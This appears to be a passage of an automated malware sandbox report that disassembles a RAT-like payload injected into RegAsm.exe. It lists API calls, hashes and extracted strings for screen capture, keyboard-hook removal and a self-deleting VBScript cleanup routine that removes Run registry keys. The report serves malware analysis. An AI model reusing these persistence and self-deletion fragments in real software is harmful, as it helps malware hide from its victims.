                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$InfoLocale_abort_free
                      • String ID:
                      • API String ID: 2692324296-0
                      • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                      • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                      • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                      • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • EnumSystemLocalesW.KERNEL32(00452313,00000001), ref: 00452082
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                      • String ID:
                      • API String ID: 1084509184-0
                      • Opcode ID: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                      • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                      • Opcode Fuzzy Hash: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                      • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                      APIs
                        • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                      • EnumSystemLocalesW.KERNEL32(Function_000483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalEnterEnumLocalesSectionSystem
                      • String ID:
                      • API String ID: 1272433827-0
                      • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                      • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                      • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                      • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • EnumSystemLocalesW.KERNEL32(00451EA7,00000001), ref: 00451F87
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                      • String ID:
                      • API String ID: 1084509184-0
                      • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                      • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                      • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                      • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                      • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                      • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                      • Instruction Fuzzy Hash:
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                      • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                      • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                      • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                      • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                      • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                      • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                      • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                      • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                      • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                      • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                      • Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                      • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                      • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                      • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                      • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                      • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                      • Opcode Fuzzy Hash: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                      • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                      • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                      • Opcode Fuzzy Hash: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                      • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                      • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                      • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                      • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                      • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
                      • Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                      • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                      • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                      • Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                      • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                      • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                      • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                      • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                      • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                      • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                      • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                      APIs
                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                      • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                        • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                      • DeleteDC.GDI32(00000000), ref: 00418F2A
                      • DeleteDC.GDI32(00000000), ref: 00418F2D
                      • DeleteObject.GDI32(00000000), ref: 00418F30
                      • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                      • DeleteDC.GDI32(00000000), ref: 00418F62
                      • DeleteDC.GDI32(00000000), ref: 00418F65
                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                      • GetCursorInfo.USER32(?), ref: 00418FA7
                      • GetIconInfo.USER32(?,?), ref: 00418FBD
                      • DeleteObject.GDI32(?), ref: 00418FEC
                      • DeleteObject.GDI32(?), ref: 00418FF9
                      • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                      • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                      • DeleteDC.GDI32(?), ref: 0041917C
                      • DeleteDC.GDI32(00000000), ref: 0041917F
                      • DeleteObject.GDI32(00000000), ref: 00419182
                      • GlobalFree.KERNEL32(?), ref: 0041918D
                      • DeleteObject.GDI32(00000000), ref: 00419241
                      • GlobalFree.KERNEL32(?), ref: 00419248
                      • DeleteDC.GDI32(?), ref: 00419258
                      • DeleteDC.GDI32(00000000), ref: 00419263
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                      • String ID: DISPLAY
                      • API String ID: 4256916514-865373369
                      • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                      • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                      • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                      • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                      APIs
                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                      • ExitProcess.KERNEL32 ref: 0040D7D0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                      • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                      • API String ID: 1861856835-332907002
                      • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
